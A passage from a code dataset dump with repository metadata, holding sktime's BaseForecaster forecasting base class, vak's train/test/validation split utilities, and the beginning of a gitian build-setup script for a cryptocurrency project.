"MIT"
] | 8 | 2020-04-06T19:48:54.000Z | 2021-03-03T10:28:30.000Z | """Unit test package for SEIR."""
| 17 | 33 | 0.647059 |
8d8af855779db22a2a7cbe05db10fa912ff0c710 | 36,577 | py | Python | sktime/forecasting/base/_base.py | BINAYKUMAR943/sktime | f02f656de86da420b1c14e58dc60194261969eb3 | [
"BSD-3-Clause"
] | 1 | 2021-05-23T20:39:50.000Z | 2021-05-23T20:39:50.000Z | sktime/forecasting/base/_base.py | BINAYKUMAR943/sktime | f02f656de86da420b1c14e58dc60194261969eb3 | [
"BSD-3-Clause"
] | 1 | 2021-05-15T16:24:02.000Z | 2021-05-16T05:25:31.000Z | sktime/forecasting/base/_base.py | BINAYKUMAR943/sktime | f02f656de86da420b1c14e58dc60194261969eb3 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Base class template for forecaster scitype.
class name: BaseForecaster
Scitype defining methods:
fitting - fit(self, y, X=None, fh=None)
forecasting - predict(self, fh=None, X=None, return_pred_int=False,
alpha=DEFAULT_ALPHA)
fit&forecast - fit_predict(self, y, X=None, fh=None,
return_pred_int=False, alpha=DEFAULT_ALPHA)
updating - update(self, y, X=None, update_params=True)
update&forecast - update_predict(y, cv=None, X=None, update_params=True,
return_pred_int=False, alpha=DEFAULT_ALPHA)
Inspection methods:
hyper-parameter inspection - get_params()
fitted parameter inspection - get_fitted_params()
State:
fitted model/strategy - by convention, any attributes ending in "_"
fitted state flag - is_fitted (property)
fitted state inspection - check_is_fitted()
copyright: sktime developers, BSD-3-Clause License (see LICENSE file)
"""
__author__ = ["Markus Löning", "@big-o", "fkiraly"]
__all__ = ["BaseForecaster"]
from sktime.base import BaseEstimator
from contextlib import contextmanager
from warnings import warn
import numpy as np
import pandas as pd
from sktime.utils.datetime import _shift
from sktime.utils.validation.forecasting import check_X
from sktime.utils.validation.forecasting import check_alpha
from sktime.utils.validation.forecasting import check_cv
from sktime.utils.validation.forecasting import check_fh
from sktime.utils.validation.forecasting import check_y_X
from sktime.utils.validation.series import check_series, check_equal_time_index
from sktime.datatypes import convert_to, mtype
DEFAULT_ALPHA = 0.05
class BaseForecaster(BaseEstimator):
"""Base forecaster template class.
The base forecaster specifies the methods and method
signatures that all forecasters have to implement.
Specific implementations of these methods is deferred to concrete
forecasters.
"""
# default tag values - these typically make the "safest" assumption
_tags = {
"scitype:y": "univariate", # which y are fine? univariate/multivariate/both
"univariate-only": True, # does estimator use the exogeneous X?
"capability:pred_int": False, # can the estimator produce prediction intervals?
"handles-missing-data": False, # can estimator handle missing data?
"y_inner_mtype": "pd.Series", # which types do _fit/_predict, support for y?
"X_inner_mtype": "pd.DataFrame", # which types do _fit/_predict, support for X?
"requires-fh-in-fit": True, # is forecasting horizon already required in fit?
"X-y-must-have-same-index": True, # can estimator handle different X/y index?
"enforce-index-type": None, # index type that needs to be enforced in X/y
}
def __init__(self):
self._is_fitted = False
self._y = None
self._X = None
# forecasting horizon
self._fh = None
self._cutoff = None # reference point for relative fh
self.converter_store_y = dict() # storage dictionary for in/output conversion
super(BaseForecaster, self).__init__()
def fit(self, y, X=None, fh=None):
"""Fit forecaster to training data.
Parameters
----------
y : pd.Series, pd.DataFrame, or np.array
Target time series to which to fit the forecaster.
fh : int, list, np.array or ForecastingHorizon, optional (default=None)
The forecasters horizon with the steps ahead to to predict.
X : pd.DataFrame, optional (default=None)
Exogeneous data
Returns
-------
self :
Reference to self.
Notes
-----
Changes state by creating a fitted model that updates attributes
ending in "_" and sets is_fitted flag to True.
stores data in self._X and self._y
stores fh, if passed
updates self.cutoff to most recent time in y
creates fitted model (attributes ending in "_")
sets is_fitted flag to true
"""
# if fit is called, fitted state is re-set
self._is_fitted = False
self._set_fh(fh)
# input checks and minor coercions on X, y
###########################################
# checking y
enforce_univariate = self.get_tag("scitype:y") == "univariate"
enforce_multivariate = self.get_tag("scitype:y") == "multivariate"
enforce_index_type = self.get_tag("enforce_index_type")
check_y_args = {
"enforce_univariate": enforce_univariate,
"enforce_multivariate": enforce_multivariate,
"enforce_index_type": enforce_index_type,
"allow_None": False,
}
y = check_series(y, **check_y_args, var_name="y")
# end checking y
# checking X
X = check_series(X, enforce_index_type=enforce_index_type, var_name="X")
if self.get_tag("X-y-must-have-same-index"):
check_equal_time_index(X, y)
# end checking X
self._X = X
self._y = y
self._set_cutoff_from_y(y)
# convert y to supported inner type, if necessary
##################################################
# retrieve supported mtypes for _fit
y_inner_mtype = self.get_tag("y_inner_mtype")
X_inner_mtype = self.get_tag("X_inner_mtype")
# convert y and X to a supported internal type
# it y/X type is already supported, no conversion takes place
y_inner = convert_to(
y,
to_type=y_inner_mtype,
as_scitype="Series", # we are dealing with series
store=self.converter_store_y,
)
X_inner = convert_to(
X,
to_type=X_inner_mtype,
as_scitype="Series", # we are dealing with series
)
# checks and conversions complete, pass to inner fit
#####################################################
self._fit(y=y_inner, X=X_inner, fh=fh)
# this should happen last
self._is_fitted = True
return self
def predict(self, fh=None, X=None, return_pred_int=False, alpha=DEFAULT_ALPHA):
"""Forecast time series at future horizon.
Parameters
----------
fh : int, list, np.array or ForecastingHorizon
Forecasting horizon
X : pd.DataFrame, optional (default=None)
Exogenous time series
return_pred_int : bool, optional (default=False)
If True, returns prediction intervals for given alpha values.
alpha : float or list, optional (default=0.95)
Returns
-------
y_pred : pd.Series
Point predictions
y_pred_int : pd.DataFrame - only if return_pred_int=True
Prediction intervals
"""
# handle inputs
self.check_is_fitted()
self._set_fh(fh)
if return_pred_int and not self.get_tag("capability:pred_int"):
raise NotImplementedError(
f"{self.__class__.__name__} does not have the capability to return "
"prediction intervals. Please set return_pred_int=False. If you "
"think this estimator should have the capability, please open "
"an issue on sktime."
)
# input check for X
enforce_index_type = self.get_tag("enforce_index_type")
X = check_series(X, enforce_index_type=enforce_index_type, var_name="X")
# convert X if needed
X_inner_mtype = self.get_tag("X_inner_mtype")
X_inner = convert_to(
X,
to_type=X_inner_mtype,
as_scitype="Series", # we are dealing with series
store=None,
)
# this should be here, but it breaks the ARIMA forecasters
# that is because check_alpha converts to list, but ARIMA forecaster
# doesn't do the check, and needs it as a float or it breaks
# todo: needs fixing in ARIMA and AutoARIMA
# alpha = check_alpha(alpha)
y_pred = self._predict(
self.fh,
X=X_inner,
return_pred_int=return_pred_int,
alpha=alpha,
)
# todo: clean this up, predictive intervals should be returned by other method
if return_pred_int:
pred_int = y_pred[1]
y_pred = y_pred[0]
# convert to default output type, dependent on scitype
scitype_y = self.get_tag("scitype:y")
to_dict = {
"univariate": "pd.Series",
"multivariate": "pd.DataFrame",
"both": "pd.DataFrame",
}
y_out = convert_to(
y_pred,
to_dict[scitype_y],
as_scitype="Series",
store=self.converter_store_y,
)
if return_pred_int:
return (y_out, pred_int)
else:
return y_out
def fit_predict(
self, y, X=None, fh=None, return_pred_int=False, alpha=DEFAULT_ALPHA
):
"""Fit and forecast time series at future horizon.
Parameters
----------
y : pd.Series
Target time series to which to fit the forecaster.
fh : int, list, np.array or ForecastingHorizon
Forecasting horizon, default = y.index (in-sample forecast)
X : pd.DataFrame, optional (default=None)
Exogenous time series
return_pred_int : bool, optional (default=False)
If True, returns prediction intervals for given alpha values.
alpha : float or list, optional (default=0.95)
Returns
-------
y_pred : pd.Series
Point predictions
y_pred_int : pd.DataFrame - only if return_pred_int=True
Prediction intervals
"""
self.fit(y=y, X=X, fh=fh)
return self._predict(fh=fh, X=X, return_pred_int=return_pred_int, alpha=alpha)
def compute_pred_int(self, y_pred, alpha=DEFAULT_ALPHA):
"""
Compute/return prediction intervals for a forecast.
Must be run *after* the forecaster has been fitted.
If alpha is iterable, multiple intervals will be calculated.
public method including checks & utility
dispatches to core logic in _compute_pred_int
Parameters
----------
y_pred : pd.Series
Point predictions.
alpha : float or list, optional (default=0.95)
A significance level or list of significance levels.
Returns
-------
intervals : pd.DataFrame
A table of upper and lower bounds for each point prediction in
``y_pred``. If ``alpha`` was iterable, then ``intervals`` will be a
list of such tables.
"""
self.check_is_fitted()
alphas = check_alpha(alpha)
errors = self._compute_pred_int(alphas)
# compute prediction intervals
pred_int = [
pd.DataFrame({"lower": y_pred - error, "upper": y_pred + error})
for error in errors
]
# for a single alpha, return single pd.DataFrame
if isinstance(alpha, float):
return pred_int[0]
# otherwise return list of pd.DataFrames
return pred_int
def update(self, y, X=None, update_params=True):
"""Update cutoff value and, optionally, fitted parameters.
This is useful in an online learning setting where new data is observed as
time moves on. Updating the cutoff value allows to generate new predictions
from the most recent time point that was observed. Updating the fitted
parameters allows to incrementally update the parameters without having to
completely refit. However, note that if no estimator-specific update method
has been implemented for updating parameters refitting is the default fall-back
option.
Parameters
----------
y : pd.Series, pd.DataFrame, or np.array
Target time series to which to fit the forecaster.
X : pd.DataFrame, optional (default=None)
Exogeneous data
update_params : bool, optional (default=True)
whether model parameters should be updated
Returns
-------
self : reference to self
Notes
-----
Update self._y and self._X with `y` and `X`, respectively.
Updates self._cutoff to last index seen in `y`. If update_params=True,
updates fitted model that updates attributes ending in "_".
"""
self.check_is_fitted()
# input checks and minor coercions on X, y
###########################################
# checking y
enforce_univariate = self.get_tag("scitype:y") == "univariate"
enforce_multivariate = self.get_tag("scitype:y") == "multivariate"
enforce_index_type = self.get_tag("enforce_index_type")
check_y_args = {
"enforce_univariate": enforce_univariate,
"enforce_multivariate": enforce_multivariate,
"enforce_index_type": enforce_index_type,
}
# update only for non-empty data
y = check_series(y, allow_empty=True, **check_y_args, var_name="y")
# end checking y
# checking X
X = check_series(X, enforce_index_type=enforce_index_type, var_name="X")
if self.get_tag("X-y-must-have-same-index"):
check_equal_time_index(X, y)
# end checking X
self._update_y_X(y, X)
# convert y to supported inner type, if necessary
##################################################
# retrieve supported mtypes for _fit
y_inner_mtype = self.get_tag("y_inner_mtype")
X_inner_mtype = self.get_tag("X_inner_mtype")
# convert y and X to a supported internal type
# it y/X type is already supported, no conversion takes place
y_inner = convert_to(
y,
to_type=y_inner_mtype,
as_scitype="Series", # we are dealing with series
store=self.converter_store_y,
)
X_inner = convert_to(
X,
to_type=X_inner_mtype,
as_scitype="Series", # we are dealing with series
)
# checks and conversions complete, pass to inner fit
#####################################################
self._update(y=y_inner, X=X_inner, update_params=update_params)
return self
def update_predict(
self,
y,
cv=None,
X=None,
update_params=True,
return_pred_int=False,
alpha=DEFAULT_ALPHA,
):
"""Make and update predictions iteratively over the test set.
Parameters
----------
y : pd.Series
cv : temporal cross-validation generator, optional (default=None)
X : pd.DataFrame, optional (default=None)
update_params : bool, optional (default=True)
return_pred_int : bool, optional (default=False)
alpha : int or list of ints, optional (default=None)
Returns
-------
y_pred : pd.Series
Point predictions
y_pred_int : pd.DataFrame
Prediction intervals
"""
self.check_is_fitted()
if return_pred_int and not self.get_tag("capability:pred_int"):
raise NotImplementedError(
f"{self.__class__.__name__} does not have the capability to return "
"prediction intervals. Please set return_pred_int=False. If you "
"think this estimator should have the capability, please open "
"an issue on sktime."
)
# input checks and minor coercions on X, y
###########################################
# checking y
enforce_univariate = self.get_tag("scitype:y") == "univariate"
enforce_multivariate = self.get_tag("scitype:y") == "multivariate"
enforce_index_type = self.get_tag("enforce_index_type")
check_y_args = {
"enforce_univariate": enforce_univariate,
"enforce_multivariate": enforce_multivariate,
"enforce_index_type": enforce_index_type,
}
# update only for non-empty data
y = check_series(y, allow_empty=True, **check_y_args, var_name="y")
# end checking y
# checking X
X = check_series(X, enforce_index_type=enforce_index_type, var_name="X")
if self.get_tag("X-y-must-have-same-index"):
check_equal_time_index(X, y)
# end checking X
cv = check_cv(cv)
return self._predict_moving_cutoff(
y,
cv,
X,
update_params=update_params,
return_pred_int=return_pred_int,
alpha=alpha,
)
def update_predict_single(
self,
y_new,
fh=None,
X=None,
update_params=True,
return_pred_int=False,
alpha=DEFAULT_ALPHA,
):
"""Update and make forecasts.
This method is useful for updating forecasts in a single step,
allowing to make use of more efficient
updating algorithms than calling update and predict sequentially.
Parameters
----------
y_new : pd.Series
fh : int, list, np.array or ForecastingHorizon
X : pd.DataFrame
update_params : bool, optional (default=False)
return_pred_int : bool, optional (default=False)
If True, prediction intervals are returned in addition to point
predictions.
alpha : float or list of floats
Returns
-------
y_pred : pd.Series
Point predictions
pred_ints : pd.DataFrame
Prediction intervals
"""
self.check_is_fitted()
self._set_fh(fh)
return self._update_predict_single(
y_new,
self.fh,
X,
update_params=update_params,
return_pred_int=return_pred_int,
alpha=alpha,
)
def score(self, y, X=None, fh=None):
"""Scores forecast against ground truth, using MAPE.
Parameters
----------
y : pd.Series
Target time series to which to compare the forecasts.
fh : int, list, array-like or ForecastingHorizon, optional (default=None)
The forecasters horizon with the steps ahead to to predict.
X : pd.DataFrame, shape=[n_obs, n_vars], optional (default=None)
An optional 2-d dataframe of exogenous variables.
Returns
-------
score : float
sMAPE loss of self.predict(fh, X) with respect to y_test.
See Also
--------
:meth:`sktime.performance_metrics.forecasting.mean_absolute_percentage_error`
"""
# no input checks needed here, they will be performed
# in predict and loss function
# symmetric=True is default for mean_absolute_percentage_error
from sktime.performance_metrics.forecasting import (
mean_absolute_percentage_error,
)
return mean_absolute_percentage_error(y, self.predict(fh, X))
def get_fitted_params(self):
"""Get fitted parameters.
Returns
-------
fitted_params : dict
"""
raise NotImplementedError("abstract method")
def _set_y_X(self, y, X=None, enforce_index_type=None):
"""Set training data.
Parameters
----------
y : pd.Series
Endogenous time series
X : pd.DataFrame, optional (default=None)
Exogenous time series
"""
# set initial training data
self._y, self._X = check_y_X(
y, X, allow_empty=False, enforce_index_type=enforce_index_type
)
# set initial cutoff to the end of the training data
self._set_cutoff_from_y(y)
def _update_X(self, X, enforce_index_type=None):
if X is not None:
X = check_X(X, enforce_index_type=enforce_index_type)
if X is len(X) > 0:
self._X = X.combine_first(self._X)
def _update_y_X(self, y, X=None, enforce_index_type=None):
"""Update training data.
Parameters
----------
y : pd.Series or pd.DataFrame
Endogenous time series
X : pd.DataFrame, optional (default=None)
Exogenous time series
"""
if len(y) > 0:
self._y = y.combine_first(self._y)
# set cutoff to the end of the observation horizon
self._set_cutoff_from_y(y)
# update X if given
if X is not None:
self._X = X.combine_first(self._X)
def _get_y_pred(self, y_in_sample, y_out_sample):
"""Combine in- & out-sample prediction, slices given fh.
Parameters
----------
y_in_sample : pd.Series
In-sample prediction
y_out_sample : pd.Series
Out-sample prediction
Returns
-------
pd.Series
y_pred, sliced by fh
"""
y_pred = y_in_sample.append(y_out_sample, ignore_index=True).rename("y_pred")
y_pred = pd.DataFrame(y_pred)
# Workaround for slicing with negative index
y_pred["idx"] = [x for x in range(-len(y_in_sample), len(y_out_sample))]
y_pred = y_pred.loc[y_pred["idx"].isin(self.fh.to_indexer(self.cutoff).values)]
y_pred.index = self.fh.to_absolute(self.cutoff)
y_pred = y_pred["y_pred"].rename(None)
return y_pred
def _get_pred_int(self, lower, upper):
"""Combine lower/upper bounds of pred.intervals, slice on fh.
Parameters
----------
lower : pd.Series
Lower bound (can contain also in-sample bound)
upper : pd.Series
Upper bound (can contain also in-sample bound)
Returns
-------
pd.DataFrame
pred_int, predicion intervalls (out-sample, sliced by fh)
"""
pred_int = pd.DataFrame({"lower": lower, "upper": upper})
# Out-sample fh
fh_out = self.fh.to_out_of_sample(cutoff=self.cutoff)
# If pred_int contains in-sample prediction intervals
if len(pred_int) > len(self._y):
len_out = len(pred_int) - len(self._y)
# Workaround for slicing with negative index
pred_int["idx"] = [x for x in range(-len(self._y), len_out)]
# If pred_int does not contain in-sample prediction intervals
else:
pred_int["idx"] = [x for x in range(len(pred_int))]
pred_int = pred_int.loc[
pred_int["idx"].isin(fh_out.to_indexer(self.cutoff).values)
]
pred_int.index = fh_out.to_absolute(self.cutoff)
pred_int = pred_int.drop(columns=["idx"])
return pred_int
@property
def cutoff(self):
"""Cut-off = "present time" state of forecaster.
Returns
-------
cutoff : int
"""
return self._cutoff
def _set_cutoff(self, cutoff):
"""Set and update cutoff.
Parameters
----------
cutoff: pandas compatible index element
Notes
-----
Set self._cutoff is to `cutoff`.
"""
self._cutoff = cutoff
def _set_cutoff_from_y(self, y):
"""Set and update cutoff from series y.
Parameters
----------
y: pd.Series, pd.DataFrame, or np.array
Target time series to which to fit the forecaster.
Notes
-----
Set self._cutoff to last index seen in `y`.
"""
if mtype(y, as_scitype="Series") in ["pd.Series", "pd.DataFrame"]:
self._cutoff = y.index[-1]
elif mtype(y, as_scitype="Series") == "np.ndarray":
self._cutoff = len(y)
else:
raise TypeError("y does not have a supported type")
@contextmanager
def _detached_cutoff(self):
"""Detached cutoff mode.
When in detached cutoff mode, the cutoff can be updated but will
be reset to the initial value after leaving the detached cutoff mode.
This is useful during rolling-cutoff forecasts when the cutoff needs
to be repeatedly reset, but afterwards should be restored to the
original value.
"""
cutoff = self.cutoff # keep initial cutoff
try:
yield
finally:
# re-set cutoff to initial value
self._set_cutoff(cutoff)
@property
def fh(self):
"""Forecasting horizon that was passed."""
# raise error if some method tries to accessed it before it has been set
if self._fh is None:
raise ValueError(
"No `fh` has been set yet, please specify `fh` " "in `fit` or `predict`"
)
return self._fh
def _set_fh(self, fh):
"""Check, set and update the forecasting horizon.
Parameters
----------
fh : None, int, list, np.ndarray or ForecastingHorizon
"""
requires_fh = self.get_tag("requires-fh-in-fit")
msg = (
f"This is because fitting of the `"
f"{self.__class__.__name__}` "
f"depends on `fh`. "
)
# below loop treats four cases from three conditions:
# A. forecaster is fitted yes/no - self.is_fitted
# B. no fh is passed yes/no - fh is None
# C. fh is optional in fit yes/no - optfh
# B. no fh is passed
if fh is None:
# A. strategy fitted (call of predict or similar)
if self._is_fitted:
# in case C. fh is optional in fit:
# if there is none from before, there is none overall - raise error
if not requires_fh and self._fh is None:
raise ValueError(
"The forecasting horizon `fh` must be passed "
"either to `fit` or `predict`, "
"but was found in neither."
)
# in case C. fh is not optional in fit: this is fine
# any error would have already been caught in fit
# A. strategy not fitted (call of fit)
elif requires_fh:
# in case fh is not optional in fit:
# fh must be passed in fit
raise ValueError(
"The forecasting horizon `fh` must be passed to "
"`fit`, but none was found. " + msg
)
# in case C. fh is optional in fit:
# this is fine, nothing to check/raise
# B. fh is passed
else:
# If fh is passed, validate (no matter the situation)
fh = check_fh(fh)
# fh is written to self if one of the following is true
# - estimator has not been fitted yet (for safety from side effects)
# - fh has not been seen yet
# - fh has been seen, but was optional in fit,
# this means fh needs not be same and can be overwritten
if not requires_fh or not self._fh or not self._is_fitted:
self._fh = fh
# there is one error condition:
# - fh is mandatory in fit, i.e., fh in predict must be same if passed
# - fh already passed, and estimator is fitted
# - fh that was passed in fit is not the same as seen in predict
# note that elif means: optfh == False, and self._is_fitted == True
elif self._fh and not np.array_equal(fh, self._fh):
# raise error if existing fh and new one don't match
raise ValueError(
"A different forecasting horizon `fh` has been "
"provided from "
"the one seen in `fit`. If you want to change the "
"forecasting "
"horizon, please re-fit the forecaster. " + msg
)
# if existing one and new match, ignore new one
def _fit(self, y, X=None, fh=None):
"""Fit forecaster to training data.
core logic
Parameters
----------
y : pd.Series
Target time series to which to fit the forecaster.
fh : int, list, np.array or ForecastingHorizon, optional (default=None)
The forecasters horizon with the steps ahead to to predict.
X : pd.DataFrame, optional (default=None)
Returns
-------
self : returns an instance of self.
"""
raise NotImplementedError("abstract method")
def _predict(self, fh, X=None, return_pred_int=False, alpha=DEFAULT_ALPHA):
"""Forecast time series at future horizon.
core logic
Parameters
----------
fh : int, list, np.array or ForecastingHorizon
Forecasting horizon
X : pd.DataFrame, optional (default=None)
Exogenous time series
return_pred_int : bool, optional (default=False)
If True, returns prediction intervals for given alpha values.
alpha : float or list, optional (default=0.95)
Returns
-------
y_pred : pd.Series
Point predictions
y_pred_int : pd.DataFrame - only if return_pred_int=True
Prediction intervals
"""
raise NotImplementedError("abstract method")
def _update(self, y, X=None, update_params=True):
"""Update time series to incremental training data.
core logic
Parameters
----------
fh : int, list, np.array or ForecastingHorizon
Forecasting horizon
X : pd.DataFrame, optional (default=None)
Exogenous time series
return_pred_int : bool, optional (default=False)
If True, returns prediction intervals for given alpha values.
alpha : float or list, optional (default=0.95)
Returns
-------
y_pred : pd.Series
Point predictions
y_pred_int : pd.DataFrame - only if return_pred_int=True
Prediction intervals
Notes
-----
Update self._y and self._X with `y` and `X`, respectively.
Updates self._cutoff to last index seen in `y`. If update_params=True,
updates fitted model that updates attributes ending in "_".
"""
if update_params:
# default to re-fitting if update is not implemented
warn(
f"NotImplementedWarning: {self.__class__.__name__} "
f"does not have a custom `update` method implemented. "
f"{self.__class__.__name__} will be refit each time "
f"`update` is called."
)
# refit with updated data, not only passed data
self.fit(self._y, self._X, self.fh)
# todo: should probably be self._fit, not self.fit
# but looping to self.fit for now to avoid interface break
return self
def _update_predict_single(
self,
y,
fh,
X=None,
update_params=True,
return_pred_int=False,
alpha=DEFAULT_ALPHA,
):
"""Update forecaster and then make forecasts.
Implements default behaviour of calling update and predict
sequentially, but can be overwritten by subclasses
to implement more efficient updating algorithms when available.
"""
self.update(y, X, update_params=update_params)
return self.predict(fh, X, return_pred_int=return_pred_int, alpha=alpha)
def _compute_pred_int(self, alphas):
"""Calculate the prediction errors for each point.
Parameters
----------
alpha : float or list, optional (default=0.95)
A significance level or list of significance levels.
Returns
-------
errors : list of pd.Series
Each series in the list will contain the errors for each point in
the forecast for the corresponding alpha.
"""
# this should be the NotImplementedError
# but current interface assumes private method
# _compute_pred_err(alphas), not _compute_pred_int
# so looping this through in order for existing classes to work
return self._compute_pred_err(alphas)
# todo: fix this in descendants, and change to
# raise NotImplementedError("abstract method")
def _compute_pred_err(self, alphas):
"""Temporary loopthrough for _compute_pred_err."""
raise NotImplementedError("abstract method")
def _predict_moving_cutoff(
self,
y,
cv,
X=None,
update_params=True,
return_pred_int=False,
alpha=DEFAULT_ALPHA,
):
"""Make single-step or multi-step moving cutoff predictions.
Parameters
----------
y : pd.Series
cv : temporal cross-validation generator
X : pd.DataFrame
update_params : bool
return_pred_int : bool
alpha : float or array-like
Returns
-------
y_pred = pd.Series
"""
if return_pred_int:
raise NotImplementedError()
fh = cv.get_fh()
y_preds = []
cutoffs = []
# enter into a detached cutoff mode
with self._detached_cutoff():
# set cutoff to time point before data
self._set_cutoff(_shift(y.index[0], by=-1))
# iterate over data
for new_window, _ in cv.split(y):
y_new = y.iloc[new_window]
# we cannot use `update_predict_single` here, as this would
# re-set the forecasting horizon, instead we use
# the internal `_update_predict_single` method
y_pred = self._update_predict_single(
y_new,
fh,
X,
update_params=update_params,
return_pred_int=return_pred_int,
alpha=alpha,
)
y_preds.append(y_pred)
cutoffs.append(self.cutoff)
return _format_moving_cutoff_predictions(y_preds, cutoffs)
def _format_moving_cutoff_predictions(y_preds, cutoffs):
"""Format moving-cutoff predictions.
Parameters
----------
y_preds: list of pd.Series or pd.DataFrames, of length n
must have equal index and equal columns
cutoffs: iterable of cutoffs, of length n
Returns
-------
y_pred: pd.DataFrame, composed of entries of y_preds
if length of elements in y_preds is 2 or larger:
row-index = index common to the y_preds elements
col-index = (cutoff[i], y_pred.column)
entry is forecast at horizon given by row, from cutoff/variable at column
if length of elements in y_preds is 1:
row-index = forecasting horizon
col-index = y_pred.column
"""
# check that input format is correct
if not isinstance(y_preds, list):
raise ValueError(f"`y_preds` must be a list, but found: {type(y_preds)}")
if len(y_preds) == 0:
return pd.DataFrame(columns=cutoffs)
if not isinstance(y_preds[0], (pd.DataFrame, pd.Series)):
raise ValueError("y_preds must be a list of pd.Series or pd.DataFrame")
ylen = len(y_preds[0])
ytype = type(y_preds[0])
if isinstance(y_preds[0], pd.DataFrame):
ycols = y_preds[0].columns
for y_pred in y_preds:
if not isinstance(y_pred, ytype):
raise ValueError("all elements of y_preds must be of the same type")
if not len(y_pred) == ylen:
raise ValueError("all elements of y_preds must be of the same length")
if isinstance(y_preds[0], pd.DataFrame):
for y_pred in y_preds:
if not y_pred.columns.equals(ycols):
raise ValueError("all elements of y_preds must have the same columns")
if len(y_preds[0]) == 1:
# return series for single step ahead predictions
y_pred = pd.concat(y_preds)
else:
y_pred = pd.concat(y_preds, axis=1, keys=cutoffs)
return y_pred
| 34.539188 | 88 | 0.586543 |
38524831f9d9e121742474727eb0a90b35058a78 | 6,430 | py | Python | src/vak/split/split.py | bollwyvl/vak | 1876b30a5b72f841e19720cca2c95d7940a5d9a9 | [
"BSD-3-Clause"
] | null | null | null | src/vak/split/split.py | bollwyvl/vak | 1876b30a5b72f841e19720cca2c95d7940a5d9a9 | [
"BSD-3-Clause"
] | null | null | null | src/vak/split/split.py | bollwyvl/vak | 1876b30a5b72f841e19720cca2c95d7940a5d9a9 | [
"BSD-3-Clause"
] | null | null | null | import warnings
import numpy as np
from ..labels import from_df as labels_from_df
from .algorithms import brute_force
from .algorithms.validate import validate_durations_convert_nonnegative
def train_test_dur_split_inds(durs,
labels,
labelset,
train_dur,
test_dur,
val_dur=None,
algo='brute_force'):
"""return indices to split a dataset into training, test, and validation sets of specified durations.
Given the durations of a set of vocalizations, and labels from the annotations for those vocalizations,
this function returns arrays of indices for splitting up the set into training, test,
and validation sets.
Using those indices will produce datasets that each contain instances of all labels in the set of labels.
Parameters
----------
durs : iterable
of float. Durations of audio files.
labels : iterable
of numpy arrays of str or int. Labels for segments (syllables, phonemes, etc.) in audio files.
labelset : set, list
set of unique labels for segments in files. Used to verify that each returned array
of indices will produce a set that contains instances of all labels found in original
set.
train_dur : float
Target duration for training set, in seconds.
test_dur : float
Target duration for test set, in seconds.
val_dur : float
Target duration for validation set, in seconds. Default is None.
If None, no indices are returned for validation set.
algo : str
algorithm to use. One of {'brute_force', 'inc_freq'}. Default is 'brute_force'. For more information
on the algorithms, see the docstrings, e.g., vak.io.algorithms.brute_force
.
Returns
-------
train_inds, test_inds, val_inds : numpy.ndarray
indices to use with some array-like object to produce sets of specified durations
"""
if len(durs) != len(labels):
raise ValueError(
f"length of durs, {len(durs)} does not equal length of labels, {len(labels)}"
)
total_dur = sum(durs)
train_dur, val_dur, test_dur = validate_durations_convert_nonnegative(train_dur,
val_dur,
test_dur,
total_dur)
if -1 not in (train_dur, val_dur, test_dur):
total_target_dur = sum([dur for dur in (train_dur, test_dur, val_dur) if dur is not None])
if total_target_dur < total_dur:
warnings.warn(
'Total target duration of training, test, and (if specified) validation sets, '
f'{total_target_dur} seconds, is less than total duration of dataset: {total_dur:.3f}. '
'Not all of dataset will be used.'
)
if total_target_dur > total_dur:
raise ValueError(
f'Total duration of dataset, {total_dur} seconds, is less than total target duration of '
f'training, test, and (if specified) validation sets: {total_target_dur}'
)
if algo == 'brute_force':
train_inds, val_inds, test_inds = brute_force(durs,
labels,
labelset,
train_dur,
val_dur,
test_dur)
else:
raise NotImplementedError(
f'algorithm {algo} not implemented'
)
return train_inds, val_inds, test_inds
def dataframe(vak_df,
labelset,
train_dur=None,
test_dur=None,
val_dur=None):
"""split a dataset of vocalizations into training, test, and (optionally) validation subsets,
specified by their duration.
Takes dataset represented as a pandas DataFrame and adds a 'split' column that assigns each
row to 'train', 'val', 'test', or 'None'.
Parameters
----------
vak_df : pandas.Dataframe
a dataset of vocalizations.
labelset : set, list
of str or int, set of labels for vocalizations.
train_dur : float
total duration of training set, in seconds. Default is None
test_dur : float
total duration of test set, in seconds. Default is None.
val_dur : float
total duration of validation set, in seconds. Default is None.
Returns
-------
vak_df : pandas.Dataframe
a copy of the input dataset with a 'split' column added,
that assigns each vocalization (row) to a subset,
i.e., train, validation, or test.
If the vocalization was not added to one of the subsets,
its value for 'split' will be 'None'.
Notes
-----
uses the function `vak.dataset.split.train_test_dur_split_inds` to find indices for each subset.
"""
vak_df = vak_df.copy() # don't want this function to have unexpected side effects, so return a copy
labels = labels_from_df(vak_df)
durs = vak_df['duration'].values
train_inds, val_inds, test_inds = train_test_dur_split_inds(durs=durs,
labels=labels,
labelset=labelset,
train_dur=train_dur,
test_dur=test_dur,
val_dur=val_dur)
# start off with all elements set to 'None'
# so we don't have to change any that are not assigned to one of the subsets to 'None' after
split_col = np.asarray(['None' for _ in range(len(vak_df))], dtype='object')
split_zip = zip(
['train', 'val', 'test'],
[train_inds, val_inds, test_inds]
)
for split_name, split_inds in split_zip:
if split_inds is not None:
split_col[split_inds] = split_name
# add split column to dataframe
vak_df['split'] = split_col
return vak_df
| 41.217949 | 109 | 0.565474 |
644e97c20123247fbd798a807f583aee99ba8d4a | 13,943 | py | Python | contrib/gitian-build.py | mnscoin/mnscoin | 62c62e528edc9caf844853a69521487802fdb139 | [
"MIT"
] | null | null | null | contrib/gitian-build.py | mnscoin/mnscoin | 62c62e528edc9caf844853a69521487802fdb139 | [
"MIT"
] | null | null | null | contrib/gitian-build.py | mnscoin/mnscoin | 62c62e528edc9caf844853a69521487802fdb139 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import argparse
import os
import subprocess
import sys
def setup():
global args, workdir
programs = ['ruby', 'git', 'apt-cacher-ng', 'make', 'wget']
if args.kvm:
programs += ['python-vm-builder', 'qemu-kvm', 'qemu-utils']
elif args.docker:
dockers = ['docker.io', 'docker-ce']
for i in dockers:
return_code = subprocess.call(['sudo', 'apt-get', 'install', '-qq', i])
if return_code == 0:
break
if return_code != 0:
print('Cannot find any way to install docker', file=sys.stderr)
exit(1)
else:
programs += ['lxc', 'debootstrap']
subprocess.check_call(['sudo', 'apt-get', 'install', '-qq'] + programs)
if not os.path.isdir('gitian.sigs'):
subprocess.check_call(['git', 'clone', 'https://github.com/MNS-Project/gitian.sigs.git'])
if not os.path.isdir('MNS-detached-sigs'):
subprocess.check_call(['git', 'clone', 'https://github.com/MNS-Project/MNS-detached-sigs.git'])
if not os.path.isdir('gitian-builder'):
subprocess.check_call(['git', 'clone', 'https://github.com/devrandom/gitian-builder.git'])
